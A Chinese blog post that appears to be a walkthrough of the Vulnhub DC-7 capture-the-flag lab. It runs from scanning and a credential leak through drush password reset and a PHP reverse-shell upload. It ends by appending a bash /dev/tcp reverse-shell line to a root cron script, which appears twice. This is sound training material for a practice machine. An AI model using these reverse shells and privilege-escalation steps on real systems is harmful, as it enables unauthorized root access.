Vulnhub-DC-7

最新推荐文章于 2023-10-01 18:28:00 发布
最新推荐文章于 2023-10-01 18:28:00 发布
阅读量394 收藏
点赞数
分类专栏: Vulnhub
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107120642
版权

此次的训练以 Drupal 为主题,并且思考方式不再是单纯的在盒子里,而是要跳出去…
扫描整获取目标 IP :nmap -sn 192.168.67.0/24
扫描目标获取相应信息:nmap -A -p- 192.168.67.242 --> 22 | 80

22 SSH 服务 || 80 HTTP 服务,猜测后面极有可能要用到 SSH 服务…查阅 http://192.168.67.242,CMS 是 Drupal,版本为 8,没有找到关于该版本的相关漏洞利用
初步浏览页面,说是引入了新的概念,需要到盒子外边去寻找线索,盒子外边?意思是不在这个站,要到别处去?要到哪里去呢?细心观察你会发现在初始界面的左下方有这么一个东西:

1592965645(1).png

再次引出,思考盒子外边?遇事不决问谷歌,其次问github,百度和必应,既然谷歌大哥不在家,那就问问github,在github找到了一些小东西:

7c936d62b0fbad0a14569b4ae30f07a.png

点进去看看,哇,config 配置文件香香的,迫不及待查看一下:

1592966188(1).png

得到用户名和密码:
$username = "dc7user";
$password = "MdR3xOgB7#dW";
尝试用 ssh 登陆,登陆成功

ssh dc7user@192.168.67.242
MdR3xOgB7#dW
ls
cd backups
ls
cd ..
cat mbox

发现 Email 版本是 4.89,看下该版本有无可疑提权的
searchsploit Exim local

1592966999(1).png

发现有一个,传过去(方法有很多)
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/
scp 46996.sh dc7user@192.168.67.242:/tmp/k.sh
cd /tmp
bash k.sh
但是报错,好吧,看看mbox还有没有没发现的东西:
从上到下,可以看到时间为 17:00 || 17:15 || 17:30 …
可以看出是隔 15 分钟就会执行一个文件[定时任务],而且,是以 root 身份权限执行~,那么路子肯定也就在这里了。去查看一下改执行文件
cat /opt/scripts/backups.sh
看着名字也大概了解是一个备份,看下该文件的权限:

1592967720(1).png

可以看到属主和属组的权限是 7 而其他没有写权限,那就要想办法以属主或属组身份进入系统,但是不知道密码,想着能不能通过数据库修改一下网页密码,然后在Drupal 系统后台上传一个有漏洞的插件?或者可以直接利用的插件?这就拿到了属组身份
cat /var/www/html/sites/default/settings.php

1592969131(1).png

mysql -u db7user -p登陆数据库
show tables;
use d7db;
show tables;
select * from users;
但是,但是,我没有看到密码字段???又把其它关于 users 的表查了个遍…木有
好吧,看看还有没有其它方法…此路不通走彼路
Drupal 是不是有一些特性是不知道的,一般来说做开发,为了提升效率,可以直接命令行来管理,Drupal有这种东西吗?
还真有,叫做 drush,查看帮助,这里需要注意的一个地方就是,需要到该站的主目录即:/var/www/html/ 下才可以执行drush

cd /var/www/html/
drush -h --> 说是输入 drush 查看全部命令,这里还需要说明一下,输错 5 次密码会被暂时封 IP
drush user-password admin --password="123"
登陆一下后台:admin 123,上传一个插件,下载地址在这里:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
点击 Extend --> Install new module – > Browser 选择文件 --> install 上传即可

1592971160.png

1592971146(1).png

将其打开后上传一个 php 反弹shell,
1592971622(1).png

kali:cp /usr/share/webshells/php/php-reverse-shell.php /root/
kali:nc -vnlp 2333
修改反弹 shell 中的内容:
3008946dd0a050525871a3667938595.png

复制到content:
e862abecd1e947882708a6c01cbc778.png
c8f464d54d937363005f8c8d8cc6fc2.png
点击 save :[注意 Text format 要选择 “PHP code”],即可获取反弹 shell

id --> www-data
python -c 'import pty;pty.spawn("/bin/bash")'

写入反弹 shell 等待 15 分钟,获取 root 权限
echo "bash -i >& /dev/tcp/192.168.67.221/6789 0>&1" >> /opt/scripts/backups.sh

kali这边需要侦听 6789 端口:
nc -vnlp 6789
id
cd /root
ls
cat theflag.txt

b7d81b34022d4d5d67115ea27bf9340.png

总结:
1.盒子外思考2.对常见的CMS要深入了解3.数据库改密4.善用搜索引擎5.软件版本漏洞利用6.细心观察[mbox]7.插件利用8.上传shell9.简单的 shell 编写 [bash -i >& /dev/tcp/192.168.67.221/6789 0>&1]10.linux 权限11.linux 定时任务

CrAcKeR-1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1042
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5732
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
[Vulnhub] DC-7
weixin_63231007的博客
01-30 330
DC系列靶机-第七弹(git信息泄露&Drupal反弹shell&drush修改Drupal账号密码)
Vulnhub DC-7
Pai_Space
03-26 5278
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
Vulnhub | DC: 7 |【实战】
bin789456的博客
08-11 1040
靶场链接:DC系列,有些知识点在DC:1中提到,可以翻阅。信息搜集 首先进行存活扫描 在这里插入图片描述 185为攻击目标,61为网关,141为物理机,115为攻击机 端口及服务详情扫描,发现有80和22端口 在这里插入图片描述 先查看一下80端口的网页,指纹非常明显,在DC1也是类似的界面,指纹是Drupal cms 在这里插入图片描述 作者给了一段话 翻译: DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么 虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
最新发布
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub-dc7
bqnagus
09-30 94
vulnhub-dc7靶机复现
Vulnhub系列--DC7
qq_33775686的博客
05-31 371
知识点: netdiscover nmap droopescan PHP Filter 反弹shell (bin shell 、MSF shell) 提权
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
Aluxian_的博客
10-01 950
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)1.信息收集工具得使用2.环境变量提权,这个靶机比较简单没啥新得知识点!3.sqlmap工具的使用搜索利用反弹shell的使用🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 577
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
VulnHub narak
weixin_45682839的博客
10-21 1084
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
VulnHubDC-7
weixin_39219503的博客
02-02 410
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 4740
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1045
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值